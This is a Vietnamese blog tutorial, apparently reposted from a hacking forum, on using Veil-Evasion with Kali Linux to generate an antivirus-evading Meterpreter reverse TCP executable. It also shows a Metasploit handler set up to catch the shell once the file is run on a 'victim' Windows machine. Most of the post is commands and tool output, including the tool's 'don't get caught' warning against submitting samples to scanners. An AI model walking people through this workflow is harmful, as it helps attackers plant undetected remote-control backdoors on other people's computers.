Home » Thủ thuật

Hướng dẫn dùng Veil tạo payload bypass antivirus

Post on 07:05 with No comments

1. Veil là gì?

Veil được biết đến như là một công cụ có khả năng vượt qua những trình diệt virus cơ bản được dùng trong hoạt động pentesting. Veil làm việc này bằng cách tạo ra một payloads ngẫu nhiên và duy nhất.Chúng ta có thể so sánh những payloads này giống nhưng những malware đa hình, khác nhau giữa host này với host kia. Những payloads này hay hơn những malware truyền thống ở chỗ nó có khả năng thay đổi chữ ký – điều mà một chương trình diệt virus thường dùng (tất nhiên là chương trình diệt virus còn dùng cách khác) để xác định malware. Những mã khai thác của Veil tương thích với hầu hết những công cụ pentest như Metasploit.

2. Dùng như thế nào?
Bài này tác giả sử dụng Kali Linux làm máy tấn công và một máy tính khác chạy Windows XP SP2 với chương trình diệt virus ClamWin. Tác giả khẳng định nó hoạt động với các chương trình diệt virus cơ bản khác.

Đầu tiên là cài Veil vì nó không được tích hợp sẵn trên Kali Linux

root@kali:~# wget https://codeload.github.com/Veil-Framework/Veil-Evasion/zip/master
root@kali:~# unzip master
root@kali:~# cd Veil-Evasion-master/setup
root@kali:~/Veil-Evasion-master/setup# ./setup.sh

Chạy veil

root@kali:~/Veil-Evasion-master/setup# cd ..
root@kali:~/Veil-Evasion-master# ./Veil-Evasion.py

Bạn sẽ thấy một menu tương tác như thế này:

=========================================================================
Veil-Evasion | [Version]: 2.16.0
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================
Main Menu
39 payloads loaded
Available commands:
use                         use a specific payload
info                        information on a specific payload
list          list available payloads
update                 update Veil to the latest version
clean                     clean out payload folders
checkvt                check payload hashes vs. VirusTotal
exit        exit Veil
[>] Please enter a command:
Dùng thử những command để hiểu hơn về Veil, ví dụ như list, info..
Veil-Evasion | [Version]: 2.16.0
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================
Payload information:
Name:                  python/meterpreter/rev_tcp
Language:           python
Rating:                  Excellent
Description:    pure windows/meterpreter/reverse_tcp stager, no
shellcode
Required Options:
Name                                   Current Value    Description
—-                                        ————-          ———–
LHOST                                  IP of the metasploit handler
LPORT                  4444       Port of the metasploit handler
compile_to_exe              Y              Compile to an executable
expire_payload               X             Optional: Payloads expire after “X” days
use_pyherion                   N             Use the pyherion encrypter

Để dùng một payload thì bạn chọn command use và mã số payloads có được từ lệnh list

[>] Please enter a command: use 26
=========================================================================
Veil-Evasion | [Version]: 2.16.0
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================
Payload: python/meterpreter/rev_tcp loaded
Required Options:
Name                                   Current Value    Description
—-                                        ————-          ———–
LHOST                                  IP of the metasploit handler
LPORT                  4444       Port of the metasploit handler
compile_to_exe              Y              Compile to an executable
expire_payload               X             Optional: Payloads expire after “X” days
use_pyherion                   N             Use the pyherion encrypter
Available commands:
set         set a specific option value
info                        show information about the payload
generate             generate payload
back                       go to the main menu
exit        exit Veil
[>] Please enter a command: set LHOST 192.168.0.14
[>] Please enter a command: generate
=========================================================================
Veil-Evasion | [Version]: 2.16.0
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================
[*] Press [enter] for ‘payload’
[>] Please enter the base name for output files: testPayload
[?] How would you like to create your payload executable?
1 – Pyinstaller (default)
2 – Pwnstaller (obfuscated Pyinstaller loader)
3 – Py2Exe
[>] Please enter the number of your choice: 1
err:winediag:SECUR32_initNTLMSP ntlm_auth was not found or is outdated. Make sure that ntlm_auth >= 3.0.25 is in your path. Usually, you can find it in the winbind package of your distribution.
130 INFO: wrote Z:\root\Veil-Evasion-master\testPayload.spec
176 INFO: Testing for ability to set icons, version resources…
189 INFO: … resource update available
191 INFO: UPX is not available.
1707 INFO: checking Analysis
1707 INFO: building Analysis because out00-Analysis.toc non existent
1707 INFO: running Analysis out00-Analysis.toc
1709 INFO: Adding Microsoft.VC90.CRT to dependent assemblies of final executable
1717 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww …
1717 INFO: Found manifest C:\windows\WinSxS\Manifests\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375.manifest
1720 INFO: Searching for file msvcr90.dll
1720 INFO: Found file C:\windows\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\msvcr90.dll
1720 INFO: Searching for file msvcp90.dll
1720 INFO: Found file C:\windows\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\msvcp90.dll
1720 INFO: Searching for file msvcm90.dll
1720 INFO: Found file C:\windows\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\msvcm90.dll
1878 INFO: Analyzing Z:\opt\pyinstaller-2.0\support\_pyi_bootstrap.py
3434 INFO: Analyzing Z:\opt\pyinstaller-2.0\PyInstaller\loader\archive.py
3625 INFO: Analyzing Z:\opt\pyinstaller-2.0\PyInstaller\loader\carchive.py
3832 INFO: Analyzing Z:\opt\pyinstaller-2.0\PyInstaller\loader\iu.py
3881 INFO: Analyzing /usr/share/veil-output/source/testPayload.py
4082 INFO: Hidden import ‘encodings’ has been found otherwise
4084 INFO: Looking for run-time hooks
4084 INFO: Analyzing rthook Z:\opt\pyinstaller-2.0\support/rthooks/pyi_rth_encodings.py
4904 INFO: Warnings written to Z:\root\Veil-Evasion-master\build\pyi.win32\testPayload\warntestPayload.txt
4911 INFO: checking PYZ
4911 INFO: rebuilding out00-PYZ.toc because out00-PYZ.pyz is missing
4911 INFO: building PYZ out00-PYZ.toc
5546 INFO: checking PKG
5546 INFO: rebuilding out00-PKG.toc because out00-PKG.pkg is missing
5546 INFO: building PKG out00-PKG.pkg
6628 INFO: checking EXE
6628 INFO: rebuilding out00-EXE.toc because testPayload.exe missing
6628 INFO: building EXE from out00-EXE.toc
6633 INFO: Appending archive to EXE Z:\root\Veil-Evasion-master\dist\testPayload.exe
=========================================================================
Veil-Evasion | [Version]: 2.16.0
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================
[*] Executable written to: /usr/share/veil-output/compiled/testPayload.exe
Language:                          python
Payload:                              python/meterpreter/rev_tcp
Required Options:      LHOST=192.168.0.14  LPORT=4444  compile_to_exe=Y
expire_payload=X  use_pyherion=N
Payload File:                      /usr/share/veil-output/source/testPayload.py
Handler File:                      /usr/share/veil-output/handlers/testPayload_handler.rc
[*] Your payload files have been generated, don’t get caught!
[!] And don’t submit samples to any online scanner!

Nó nhắc các bạn là đừng có submit payload này lên mấy trang scan online kìa Shy

Xong, như vậy bạn đã có 1 file exe có khả năng bypass được một số antivirus (hi vọng thế)

Bước tiếp theo là copy file đó lên máy victim và chạy nó. Trên Kali Linux chúng ta sẽ mở một cái handler cho cái reverse tcp

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.14
LHOST => 192.168.0.14
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j

Theo: http://forum.ceh.vn/Huong-dan-dung-Veil-tao-payload-bypass-antivirus-thread-7431-post-28093.ceh#pid28093